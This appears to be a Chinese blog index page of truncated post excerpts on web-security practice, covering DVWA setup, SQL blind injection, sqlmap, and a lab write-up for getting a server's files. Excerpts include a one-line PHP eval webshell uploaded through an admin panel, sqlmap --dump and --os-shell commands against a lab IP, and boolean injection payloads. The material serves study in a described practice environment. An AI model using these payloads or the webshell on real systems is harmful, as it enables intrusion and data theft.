- 博客(11)
- 收藏
- 关注
RSS订阅原创 DOS命令学习
DOS命令 一、简介 DOS命令,是DOS操作系统的命令,是一种面向磁盘的操作命令,主要包括目录操作类命令、磁盘操作类命令、文件操作类命令和其它命令。 DOS命令不区分大小写 二、常用命令 (一)、cd-改变当前目录 1、功能:改变当前目录 2、格式:cd [/D] [drive:] [path] (1)、省略路径和子目录名显示当前命令 (2)、CD\ 返回根目录 (3)、cd … 退回上一级目录 . \ 在路径的\后紧跟或者单独出现时: 一个.表示当前目录; 两个.表示上一级目录; 在路径中的文件名中出
2021-03-22 19:40:14
373
原创 搭建dvwa环境和BlueLotus_XSSReceiver环境
前期准备 下载phpstudy安装包安装好phpstudy 下载地址 安装教程 一、安装dvwa平台 下载地址 将下载到的安装包放在我们前面安装的phpstudy下的www目录下并解压 接下来打开PHP study 打开apache和mysql (注意如果电脑里安装了其他的MySQL要提前关闭否则会冲突无法打开) 配置DVWA的数据库,打开config文件夹,找到config.inc.php.dist,先备份再修改文件名为config.inc.php,打开它,修改db_password和db_user为r
2020-10-25 11:03:49
621
原创 安装docker搭建XSS容器
一、安装docker 首先确保xshell连接CentOS(当然直接用虚拟机也可以) 安装一些虚拟机下载命令 sudo yum install -y yum-utils device-mapper-persistent-data lvm2 添加软件源 sudo yum-config-manager --add-repo https://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo 安装Docker-CE sudo yum makecac
2020-10-17 14:04:44
591
原创 sql盲注
盲注 首先判断注入类型 可以发现我们对url进行注入页面没有给我们什么有用的提示,那么我们可以判断这应该需要盲注 一、布尔类型 1、判断数据库长度 id' or length(database())>7 --+ id' or length(database())>8 --+ 可以发现数据库名大于7正确但是大于8错误那么应该是8 2、测试数据库名具体字符 使用substr函数对数据库名进行获取(substr函数只能一个一个字符获取)并且使用ascii函数将获得的转换为数字进行比较 id=0
2020-09-23 23:08:29
384
原创 sqlmap之--os-shell应用
一、找到网站注入点然后进入sqlmap进行攻击(学校靶机) sqlmap -u "http://117.167.136.244:28055/ajax.php?act=selgo" --data "tyid=1" -D faka -T ayangw_config --dump 二、输入sqlmap.py -u "http://117.167.136.244:28060/ajax.php?act=selKm" --data "gid=1" --is-dba判断是否具有数据库管理员权限 确定具有后进行下一步操作
2020-09-19 22:43:32
6638
原创 Sql注入之做post注入
一、使用burp suite进行抓包 1、将浏览器换为proxy连接 2、点击页面会与数据库交互的位置得到包 3、选择
2020-09-19 22:11:03
1281
原创 获取服务器目录
一、进入后台(靶机测试) 通过sql注入得到的账号与密码进入后台 二、上传文件 1、找到后台内上传文件位置上传一个webshell.php文件其中包含 <?php @eval($_POST['shell']);?> 2、找到网站前台页面点击文件 选择你所上传文件点击下载从下载页面获取文件网址 三、通过蚁剑获取服务器目录 1、打开蚁剑点击右键选择添加数据 2、将获得的文件网址放进第一行密码填入shell 3、点击保存 双击网址即可进入服务器目录 四、寻找flag 进入根目录点击flag文件
2020-09-15 15:27:00
1145
原创 sql注入实例
一、判断注入点(靶机示例) 点击一篇文章寻找注入点 注入点测试: 确定可以注入 二、使用sqlmap进行注入 1、打开sqlmap输入sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3093” -dbs 得到库 2、根据网页显示为软件学院我们选择rjxy进行库破解输入sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3093” -D rjxy
2020-09-12 20:33:12
404
原创 宝塔搭建sqli-labs-master网站
一、开启Linux虚拟机输入"ip ddr"得到主机地址二、在cmd中获得宝塔面板账号 方法: 1 输入“ssh root@192.***.***132(上一步得到的主机地址) 2 输入自己的密码 3 输入bt开启宝塔面板 4 输入14编号得到宝塔账号 三、搭建网站 ...
2020-09-10 22:50:57
731
2
原创 sqlmap安装与使用
一、在网站上搜索sqlmap下载 下载链接 二、安装 1 选择地方解压 2 在桌面创建快捷方式 (1)在其中输入cmd并命名(2)右击鼠标选择快捷方式属性 (3)目标位置不变,起始位置改为sqlmap文件位置这样就完成快捷方式设置了。 三、使用 1 点击快捷方式进入 2 输入sqlmap.py -u "http://127.0.0.1/Less-1/?id=1"测试并得到如id,数据库等信息 2 进行注入 输入sqlmap.py -u “http://127.0.0.1/Less-1/?id=1” --d
2020-09-10 15:34:24
332
原创 第一次搭建blog
第一次搭建博客 1、什么是blog 01 博客是日常学习的新知识 02 方便之后求职 0x01 blog的写法 写标题 使用# 一级标题用一个#后面空格再带标题 二级标题用两个#后面带空格再带标题 以此类推,几级标题就用几个# 插图像 使用!和[] 加() 在中括号中填入对图像的描述,在()中填入图像地址 或者可以直接复制图像 插入链接 使用[]和() 在[]中填入标题,在()填入链接 引用代码 用反引号括起来一句就用一组反引号,代码块用三个反引号连着括起来例如 ...
2020-09-07 18:35:58
132
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人